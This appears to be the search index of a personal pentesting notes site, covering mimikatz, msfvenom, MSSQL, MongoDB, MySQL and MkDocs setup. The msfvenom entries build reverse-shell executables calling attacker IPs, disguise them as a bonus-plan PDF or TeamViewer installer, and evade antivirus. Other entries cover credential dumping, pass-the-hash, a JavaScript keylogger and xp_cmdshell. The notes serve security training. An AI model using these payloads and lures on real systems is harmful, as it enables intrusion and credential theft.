                        use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION <action-name>\n\nshow options\n# set <options>\n\nrun\n
                        ","tags":["pentesting"]},{"location":"metasploit/#the-http_javascript_keylogger","title":"The http_javascript_keylogger","text":"

                        This module runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to \"test\", the following URL will load this script into the calling site: http://server:port/test/anything.js

                        use auxiliary/server/capture/http_javascript_keylogger\n
                        ","tags":["pentesting"]},{"location":"mimikatz/","title":"mimikatz","text":"

                        Mimikatz is a tool written in C.

                        It is well known for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash and pass-the-ticket attacks, and build Golden Tickets.

                        The Kiwi module available in a Metasploit meterpreter session is an adaptation of Mimikatz.
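
                        A minimal sketch of loading Kiwi inside an elevated meterpreter session:

                        load kiwi\ncreds_all\nlsa_dump_sam\n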

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#no-installation-portable","title":"No installation, portable","text":"

                        Download from github repo: https://github.com/gentilkiwi/mimikatz.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#basic-usage","title":"Basic usage","text":"
                        # Impersonate NT AUTHORITY\\SYSTEM (requires permissions to do so)\ntoken::elevate\n\n# List users and hashes of the machine\nlsadump::sam\n\n# Enable debug mode for our user\nprivilege::debug\n\n# List users logged into the machine and still in memory\nsekurlsa::logonPasswords full\n\n# Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we can use cmd.exe to execute commands in the user's context.\n
                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mitm-relay/","title":"mitm_relay","text":"

                        Hackish way to intercept and modify non-HTTP protocols through Burp & others with support for SSL and STARTTLS interception

                        This script is a very simple, quick, and easy way to MiTM any arbitrary protocol through existing traffic interception software such as Burp Proxy or Proxenet. It can be particularly useful for thick client security assessments. It saves you from the pain of having to configure a specific setup to intercept exotic protocols, or protocols that can't be easily intercepted. TCP and UDP are supported.

                        It's \"hackish\" in the way that it was specifically designed to use interception and modification capabilities of existing proxies, but for arbitrary protocols. In order to achieve that, each client request and server response is wrapped into the body of a HTTP POST request, and sent to a local dummy \"echo-back\" web server via the proxy. Therefore, the HTTP responses or headers that you will see in your intercepting proxy are meaningless and can be disregarded. Yet the dummy web server is necessary in order for the interception tool to get the data back and feed it back to the tool.

                        • The requests from client to server will appear as a request to a URL containing \"CLIENT_REQUEST\"
                        • The responses from server to client will appear as a request to a URL containing \"SERVER_RESPONSE\"

                        This way, it is completely asynchronous, meaning that if the server sends responses in successive packets it won't be a problem.

                        To intercept only server responses, configure your interception rules like so:

                        \"Match and Replace\" rules can be used. However, using other Burp features such as repeater, intruder or scanner is pointless. That would only target the dummy webserver used to echo the data back.

                        The normal request traffic flow during typical usage would be as below:

                        ","tags":["windows","thick applications"]},{"location":"mitm-relay/#installation","title":"Installation","text":"

                        Download from the GitHub repo: https://github.com/jrmdev/mitm_relay (\"Hackish way to intercept and modify non-HTTP protocols through Burp & others\").

                        ","tags":["windows","thick applications"]},{"location":"mitm-relay/#requirements","title":"Requirements","text":"

                        1. mitm_relay requires Python 3. To make sure it doesn't conflict with the pip module, we can use version 3.7.6. Download it from https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe and install it. Once installed, restart the system.

                        2. We may also run into problems such as missing modules. To get them installed, download getpip.py from https://github.com/amandaguglieri/python/blob/main/getpip.py

                        After installing pip, to install a module, run:

                        python -m pip install <nameofmodule>\n
                        ","tags":["windows","thick applications"]},{"location":"mmc-console/","title":"Microsoft Management Console (MMC)","text":"

                        You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

                        We can also open the MMC Console from a non-domain joined computer using the following command syntax:

                        runas /netonly /user:Domain_Name\\Domain_USER mmc\n

                        Now, you will have the MMC interface:

                        We can add any of the RSAT snap-ins and enumerate the target domain in the context of the target user sally.jones in the freightlogistics.local domain. After adding the snap-ins, we will get an error message that the \"specified domain either does not exist or could not be contacted.\" From here, we have to right-click on the Active Directory Users and Computers snap-in (or any other chosen snap-in) and choose Change Domain.

                        Type the target domain into the Change domain dialogue box, here freightlogistics.local. From here, we can now freely enumerate the domain using any of the AD RSAT snapins.

                        ","tags":["active directory","ldap","windows"]},{"location":"mobsf/","title":"Mobile Security Framework - MobSF","text":"

                        Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, XAPK, IPA & APPX), among other formats.

                        ","tags":["mobile pentesting"]},{"location":"mobsf/#installation","title":"Installation","text":"
                        1. Install Git using the command below:
                        sudo apt-get install git\n
                        2. Install Python 3.8/3.9 using the command below:
                        sudo apt-get install python3.8\n
                        3. Install the JDK.

                        Download from: https://www.oracle.com/java/technologies/javase-java-archive-javase6-downloads.html

                        Then:

                        chmod +x jdk-6u45-linux-x64.bin\nsh jdk-6u45-linux-x64.bin      \n

                        4. Install the required dependencies using the command below:
                        sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg62-turbo-dev zlib1g-dev wkhtmltopdf\n
                        5. Download MobSF using the command below:
                        git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\n

                        Setup MobSF using command:

                        sudo ./setup.sh\n

                        Run!

                        ./run.sh 127.0.0.1:8000\n\n# Note: we can use any port number instead of 8000, but it must be available\n

                        Access the MobSF web interface in browser using the URL: http://127.0.0.1:8000

                        ","tags":["mobile pentesting"]},{"location":"mongo/","title":"Mongo","text":"

                        By default, mongo uses TCP ports 27017-27018.

                        ","tags":["database","database","NoSQL"]},{"location":"mongo/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

                        By default, mongo does not require a password. admin is a common default admin user for mongo databases.

                        mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n

                        A collection is a group of documents in the database.

                        ","tags":["database","database","NoSQL"]},{"location":"mongo/#basic-usage","title":"Basic usage","text":"
                        # Enter the mongodb shell\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count()\n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"})\n\n# Find in the city collection all documents whose city field matches \"MA\" and return the count\ndb.city.find({\"city\":\"MA\"}).count()\n\n# How many cities of state \"Indiana\" have population greater than 15000 in collection \"city\" in database \"city\"?\ndb.city.find({$and:[{\"state\":\"IN\"}, {\"pop\":{$gt:15000}}]}).count()\n\n\n####################\n# Operators\n####################\n# Greater than: $gt\ndb.city.find({\"population\":{$gt:150000}}).count()\n\n# And operator: $and\ndb.city.find({$and:[{population:{$gt:150000}},{\"state\":\"FLORIDA\"}]})\n\n# Or operator: $or\ndb.city.find({$or:[{population:{$lt:1000}},{\"state\":\"FLORIDA\"}]})\n\n# Not equal operator: $ne\n# Equal operator: $eq\n\n# Additionally, you can use regex. Cities that start with HA:\ndb.city.find({\"city\":{$regex:\"^HA.*\"}})\n\n# What is the name of the 101st city in collection \"city\" when sorted in ascending order according to \"city\" in database \"city\"?\ndb.city.find().sort({\"city\":1}).skip(100).limit(1)\n\n#####################\n# Operations\n#####################\n# Perform an average on an aggregate of documents\ndb.city.aggregate([{$group:{_id:null, avg:{$avg:\"$population\"}}}])\n\n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
                        ","tags":["database","database","NoSQL"]},{"location":"moodlescan/","title":"moodlescan","text":"

                        My eval: I'm not sure about how accurate it is. I was working on the Goldeneye1 machine from VulnHub, and moodlescan identified the Moodle version as 2.2.2 when in reality it is 2.2.3.

                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#installation","title":"Installation","text":"

                        Requirements: Python 3 and the python3-pip package.

                        git clone https://github.com/inc0d3/moodlescan\ncd moodlescan\npip install -r requirements.txt\n
                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#basic-commands","title":"Basic commands","text":"
                        python moodlescan.py -u [URL]\n\n\n# Options\n#       -u [URL]    : URL with the target, the moodle to scan\n#       -a      : Update the database of vulnerabilities to latest version\n#       -r      : Enable HTTP requests with random user-agent\n#       -k      : Ignore SSL Certificate\n#       Proxy configuration\n#\n#       -p [URL]    : URL of proxy server (http)\n#       -b [user]   : User for authenticating to the proxy server\n#       -c [password]   : Password for authenticating to the proxy server\n#       -d [protocol]  : Protocol of authentication: basic or ntlm\n
                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"msfvenom/","title":"msfvenom","text":"

                        MSFVenom is the successor of MSFPayload and MSFEncode, two stand-alone scripts that used to work in conjunction with msfconsole to provide users with highly customizable and hard-to-detect payloads for their exploits.

                        You can generate a webshell by using msfvenom:

                        # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n\n# list all the available payloads\nmsfvenom -l payloads  \n

                        Also, msfvenom can use Metasploit payloads under \"cmd/unix\" to generate one-liner bind or reverse shells. List the options with:

                        msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#some-flags","title":"Some flags","text":"
                        # -b, or --bad-chars: The list of characters to avoid, for example: '\\x00'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#staged-payload","title":"Staged payload","text":"
                        # Example of a linux staged payload\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.66.166.2 lport=443 -f elf -o newfile\n\n# Example of a windows staged payload\nmsfvenom -p windows/x64/meterpreter/bind_tcp lhost=10.10.14.72 lport=1234 -f aspx -o lal\n

                        After that, make the file executable:

                        chmod +x newfile\u00a0\n

                        When creating a staged payload, you will need to use a Metasploit handler (exploit/multi/handler) in order to receive the shell connection, as only Metasploit contains the logic to send the rest of the payload to the connecting stager. The handler's payload has to be the same one used with MSFVenom.
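
                        A minimal handler sketch matching the Linux staged payload above:

                        msfconsole -q\nuse exploit/multi/handler\nset payload linux/x64/shell/reverse_tcp\nset LHOST 192.66.166.2\nset LPORT 443\nrun\n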

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#stagedless-payload","title":"Stagedless payload","text":"

                        A stageless payload is a standalone program that does not need anything additional (no Metasploit connection), just a netcat listener on the attacker's computer.

                        # Example of a windows stageless payload\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe\n

                        If the AV is disabled, all the user would need to do is double-click on the file to execute it, and we would have a shell session.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-dll-file-with-a-webshell","title":"crafting a DLL file with a webshell","text":"

                        msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n
                        More about DLL hijacking in thick client applications.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-exe-file-with-shikata-ga-nai-encoder","title":"crafting a .exe file with Shikata Ga Nai encoder","text":"
                        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe\n\n# -e: chosen encoder \n

                        The Shikata Ga Nai encoder will most likely be detected by AV and IDS/IPS. A better option is to run it through multiple iterations of the same encoding scheme:

                        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe\n

                        But, still, we could be getting detected.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#module-msf-virustotal","title":"Module msf-virustotal","text":"

                        Alternatively, Metasploit offers a tool called msf-virustotal that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal.

                        msf-virustotal -k <API key> -f TeamViewerInstall.exe\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#packers","title":"Packers","text":"

                        The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.

                        A list of popular packer software:

                        • UPX packer
                        • The Enigma Protector
                        • MPRESS
                        • Alternate EXE Packer
                        • ExeStealth
                        • Morphine
                        • MEW
                        • Themida

                        If we want to learn more about packers, please check out the PolyPack project.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#mitical-attacks","title":"Mitical attacks","text":"Vulnerability Description MS08-067 MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability. Eternal Blue MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host. PrintNightmare A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021. 0xdf wrote an awesome post on it here. BlueKeep CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2. Sigred CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller. SeriousSam CVE 2021-36924 exploits an issue with the way Windows handles permission on the C:\\Windows\\system32\\config folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials. Zerologon CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft\u2019s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.","tags":["pentesting","terminal","shells"]},{"location":"mssql/","title":"MSSQL - Microsoft SQL Server","text":"

                        Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications\u2014which may run either on the same computer or on another computer across a network. Wikipedia.

                        By default, MSSQL uses ports\u00a0TCP/1433\u00a0and\u00a0UDP/1434. \u00a0However, when MSSQL operates in a \"hidden\" mode, it uses the\u00a0TCP/2433\u00a0port.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-databases","title":"MSSQL Databases","text":"

                        MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

                        Default System Database Description master Tracks all system information for an SQL server instance model Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database msdb The SQL Server Agent uses this database to schedule jobs & alerts tempdb Stores temporary objects resource Read-only database containing system objects included with SQL server

                        Table source: System Databases Microsoft Doc and HTB Academy

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

                        MSSQL supports two authentication modes, which means that users can be created in Windows or the SQL Server:

                        • Windows authentication mode: This is the default, often referred to as integrated security because the SQL Server security model is tightly integrated with Windows/Active Directory. Specific Windows user and group accounts are trusted to log in to SQL Server. Windows users who have already been authenticated do not have to present additional credentials.
                        • Mixed mode: Mixed mode supports authentication by Windows/Active Directory accounts and SQL Server. Username and password pairs are maintained within SQL Server.
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-clients","title":"MSSQL Clients","text":"
                        • SQL Server Management Studio (SSMS) comes as a feature that can be installed with the MSSQL install package or can be downloaded & installed separately
                        • mssql-cli
                        • SQL Server PowerShell
                        • HeidiSQL
                        • SQLPro
                        • Impacket's mssqlclient.py. To locate it:
                        locate mssqlclient\n

                        Of the MSSQL clients listed above, pentesters may find Impacket's mssqlclient.py to be the most useful due to SecureAuthCorp's Impacket project being present on many pentesting distributions at install.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#database-configuration","title":"Database configuration","text":"

                        When an admin initially installs and configures MSSQL to be network accessible, the SQL service will likely run as NT SERVICE\\MSSQLSERVER. Connecting from the client-side is possible through Windows Authentication, and by default, encryption is not enforced when attempting to connect.

                        Authentication being set to Windows Authentication means that the underlying Windows OS will process the login request and use either the local SAM database or the domain controller (hosting Active Directory) before allowing connectivity to the database management system.

                        Misconfigurations to look at:

                        • MSSQL clients not using encryption to connect to the MSSQL server.
                        • The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates
                        • The use of named pipes
                        • Weak & default sa credentials. Admins may forget to disable this account
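
                        A quick footprinting sketch for spotting some of these issues with nmap (the script selection is an assumption):

                        sudo nmap -sV -sC -p1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info $ip\n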
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#interact-with-mssql","title":"Interact with MSSQL","text":"","tags":["database","cheat sheet"]},{"location":"mssql/#from-linux","title":"From Linux","text":"

                        sqsh

                         sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#from-windows","title":"From Windows","text":"

                        sqlcmd

                        The\u00a0sqlcmd\u00a0utility lets you enter Transact-SQL statements, system procedures, and script files through a variety of available modes:

                        • At the command prompt.
                        • In Query Editor in SQLCMD mode.
                        • In a Windows script file.
                        • In an operating system (Cmd.exe) job step of a SQL Server Agent job.

                        Careful. In some environments the command GO needs to be in lowercase.

                        sqlcmd -S $IP -U username -P Password123\n\n\n# We need to use GO after our query to execute the SQL syntax. \n# List databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Use a database\nUSE dbName\ngo\n\n# Show tables\nSELECT table_name FROM dbName.INFORMATION_SCHEMA.TABLES\ngo\n\n# Select all Data from Table \"users\"\nSELECT * FROM users\ngo\n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#gui-application","title":"GUI Application","text":"

                        mssql-cli, mssqlclient.py, dbeaver

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#sql-server-management-studio-or-ssms","title":"SQL Server Management Studio or SSMS","text":"

                        Windows only. Download, install, and connect to the database.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#dbeaver","title":"dbeaver","text":"

                        dbeaver is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssqlclientpy","title":"mssqlclient.py","text":"

                        Alternatively, we can use the tool from Impacket with the name\u00a0mssqlclient.py.

                        mssqlclient.py -p 1433 <username>@$ip \n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#basic-commands","title":"Basic commands","text":"
                        # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo\n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure:\nSELECT is_srvrolemember('sysadmin')\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\n

                        Also, you might be interested in executing a cmd shell using xp_cmdshell by reconfiguring sp_configure.
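
                        A minimal sketch of enabling and running xp_cmdshell via sp_configure (requires sysadmin rights):

                        EXEC sp_configure 'show advanced options', 1;\nRECONFIGURE;\nEXEC sp_configure 'xp_cmdshell', 1;\nRECONFIGURE;\ngo\n\nEXEC xp_cmdshell 'whoami';\ngo\n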

                        ","tags":["database","cheat sheet"]},{"location":"my-mkdocs-material-customization/","title":"mkdocs","text":"

                        MkDocs is a static site generator for building project documentation. Documentation source files are written in Markdown, and configured with a single YAML configuration file.

                        I chose mkdocs to build the site because of its simplicity.

                        Link to site.

                        Some other options: hugo.

                        "},{"location":"my-mkdocs-material-customization/#my-install","title":"My install","text":"

                        Install a virtual environment such as virtualenvwrapper.

                        Create your virtual environment and activate it:

                        mkvirtualenv hackinglife\n\nworkon hackinglife\n

                        Install mkdocs. It's version 1.5.3 in my case:

                        pip install mkdocs==1.5.3\n

                        Install material theme for mkdocs:

                        pip install mkdocs-material\n

                        Install plugins such as glightbox:

                        pip install mkdocs-glightbox\n

                        Install plugins such as \"git-revision-date-localized\"

                        pip3 install mkdocs-git-revision-date-localized-plugin\n

                        Install plugins such as \"mkdocs-pdf-export\"

                        pip install mkdocs-pdf-export-plugin\n
                        "},{"location":"my-mkdocs-material-customization/#customizing-material-theme-pluggins-and-extensions","title":"Customizing Material theme: pluggins and extensions","text":"

                        Some plugins, like "mkdocs-glightbox", "mkdocs-git-revision-date-localized-plugin", or "mkdocs-pdf-export-plugin", need to be added when the web app is deployed, so they are added at .github/workflow/doc.yml.

                        But some other plugins just need to be added in the mkdocs configuration file (mkdocs.yml) like this:

                        markdown_extensions:\n    - extensionName\n
                        "},{"location":"my-mkdocs-material-customization/#admonition-extension","title":"Admonition extension","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/admonitions/

                        In mkdocs.yml:

                        markdown_extensions:\n    - admonition\n    - pymdownx.details \n    - pymdownx.superfences\n
                        "},{"location":"my-mkdocs-material-customization/#basic-syntax","title":"Basic syntax","text":"

                        Code in the document:

                        !!! note \"title\"\n\n    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod \n    nulla. \n

                        How it is seen:

                        title

                        Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla.

                        Admonitions follow a simple syntax: a block starts with\u00a0!!!, followed by a single keyword used as a\u00a0type qualifier. The content of the block follows on the next line, indented by four spaces

                        !!! <typeofchart> \"title\"\n

                        When\u00a0Details\u00a0is enabled and an admonition block is started with\u00a0???\u00a0instead of\u00a0!!!, the admonition is rendered as a collapsible block with a small toggle on the right side.

                        These are the type qualifiers: note, abstract, info, tip, success, question, warning, failure, danger, bug, example, quote.

                        "},{"location":"my-mkdocs-material-customization/#content-tabs","title":"Content tabs","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/content-tabs/

                        In mkdocs.yml:

                        markdown_extensions:\n  - pymdownx.superfences\n  - pymdownx.tabbed:\n      alternate_style: true \n

                        Code in the document:

                        === \"Left\"\n    Content\n\n=== \"Center\"\n    Content\n\n=== \"Right\"\n    Content\n

                        How it is seen:

                        LeftCenterRight

                        Content

                        Content

                        Content

                        "},{"location":"my-mkdocs-material-customization/#data-tables","title":"Data tables","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/data-tables/#customization

                        In mkdocs.yml:

                         extra_javascript:\n      - https://unpkg.com/tablesort@5.3.0/dist/tablesort.min.js\n      - javascripts/tablesort.js\n

                        After applying the customization, data tables can be sorted by clicking on a column. This is the code in the document:

                        Data table, columns sortable
                        | Method      | Description                          |\n| ----------- | ------------------------------------ |\n| `GET`       | Fetch resource  |\n| `PUT`       | Update resource |\n| `DELETE`    | Delete resource |\n

                        This is how it is seen:

                        Method Description GET Fetch resource PUT Update resource DELETE Delete resource"},{"location":"my-mkdocs-material-customization/#pdf-button-in-every-page","title":"PDF button in every page","text":"

                        Most of the existing plugins offer a print-all-in-one-file solution, which is not what I intend to build.

                        "},{"location":"my-mkdocs-material-customization/#mkdocs-pdf-export-plugin","title":"mkdocs-pdf-export-plugin","text":"

                        https://github.com/zhaoterryy/mkdocs-pdf-export-plugin

                        Install and add to gh-deploy workflow:

                        pip install mkdocs-pdf-export-plugin\n

                        mkdocs.yml

                        plugins:\n    - search\n    - pdf-export:\n        verbose: true\n        combined: false\n        media_type: print\n        enabled_if_env: ENABLE_PDF_EXPORT\n

                        /docs/css/extra.css

                        @page {\n    size: a4 portrait;\n    margin: 25mm 10mm 25mm 10mm;\n    counter-increment: page;\n    font-family: \"Roboto\",\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n    white-space: pre;\n    color: grey;\n    @top-left {\n        content: '\u00a9 2018 My Company';\n    }\n    @top-center {\n        content: string(chapter);\n    }\n    @top-right {\n        content: 'Page ' counter(page);\n    }\n}\n
                        "},{"location":"my-mkdocs-material-customization/#resolving-relative-link-issues-when-rendering","title":"Resolving relative link issues when rendering","text":"

                        https://octoprint.github.io/mkdocs-site-urls/

                        "},{"location":"my-mkdocs-material-customization/#revision-date","title":"Revision date","text":"

                        https://timvink.github.io/mkdocs-git-revision-date-localized-plugin/

                        Install and add to gh-deploy workflow:

                        # Install the git revision date (localized) plugin\npip install mkdocs-git-revision-date-localized-plugin\n

                        mkdocs.yml

                        # Adding the git revision date plugin\nplugins:\n  - search\n  - git-revision-date-localized:\n      type: timeago\n      timezone: Europe/Amsterdam\n      fallback_to_build_date: false\n      enable_creation_date: true\n      exclude:\n        - index.md\n      enabled: true\n      strict: true\n

                        This plugin needs access to the last commit that touched a specific file to be able to retrieve the date. By default many build environments only retrieve the last commit, which means you might need to:

                        • github actions: set\u00a0fetch-depth\u00a0to\u00a00\u00a0(docs)

                        Types

                        November 28, 2019           # type: date (default)\nNovember 28, 2019 13:57:28  # type: datetime\n2019-11-28                  # type: iso_date\n2019-11-28 13:57:26         # type: iso_datetime\n20 hours ago                # type: timeago\n28. November 2019           # type: custom\n

                        To add a revision date to the default mkdocs theme, add an overrides/partials folder to your docs folder and update your mkdocs.yml file. Then you can extend the base mkdocs theme by adding a new file docs/overrides/content.html:

                        mkdocs.yml
                        theme:\n    name: mkdocs\n    custom_dir: docs/overrides\n
                        docs/hackinglifetheme/partials/content.html
                        <!-- Overwrites content.html base mkdocs theme, taken from \nhttps://github.com/mkdocs/mkdocs/blob/master/mkdocs/themes/mkdocs/content.html -->\n\n{% if page.meta.source %}\n    <div class=\"source-links\">\n    {% for filename in page.meta.source %}\n        <span class=\"label label-primary\">{{ filename }}</span>\n    {% endfor %}\n    </div>\n{% endif %}\n\n{{ page.content }}\n\n<!-- This section adds support for localized revision dates -->\n{% if page.meta.git_revision_date_localized %}\n    <small>Last update: {{ page.meta.git_revision_date_localized }}</small>\n{% endif %}\n{% if page.meta.git_created_date_localized %}\n    <small>Created: {{ page.meta.git_created_date_localized_raw_datetime }}</small>\n{% endif %}\n
                        "},{"location":"mybb-pentesting/","title":"Pentesting MyBB","text":"

                        Once we know we are in front of a MyBB CMS, one useful tool would be MyBBscan.

                        ","tags":["MyBB","pentesting","CMS"]},{"location":"mybb-pentesting/#mybbscan","title":"MyBBScan","text":"

                        Original repo: https://github.com/0xB9/MyBBscan.

                        My forked repo: https://github.com/amandaguglieri/CMS-MyBBscan.

                        ","tags":["MyBB","pentesting","CMS"]},{"location":"mysql/","title":"MySQL","text":"

                        MySQL is an open-source relational database management system (RDBMS) based on Structured Query Language (SQL). It is developed and managed by Oracle Corporation and was initially released on 23 May 1995. It is widely used in many small and large scale industrial applications and is capable of handling a large volume of data. After the acquisition of MySQL by Oracle, concerns arose about the database's future, and hence MariaDB was developed as a fork.

                        By default, MySQL uses\u00a0TCP/3306.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

                        MySQL supports different authentication methods, such as username and password, as well as Windows authentication (a plugin is required).

                        MySQL\u00a0default system schemas/databases:

                        • mysql\u00a0- is the system database that contains tables that store information required by the MySQL server
                        • information_schema\u00a0- provides access to database metadata
                        • performance_schema\u00a0- is a feature for monitoring MySQL Server execution at a low level
                        • sys\u00a0- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#footprinting-mysql","title":"Footprinting mysql","text":"
                        sudo nmap $ip -sV -sC -p3306 --script mysql*\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-commands","title":"Basic commands","text":"

                        Additionally, there are two character sequences that you can use to comment out a line in SQL:

                        • # The hash symbol.
                        • -- Two dashes followed by a space.
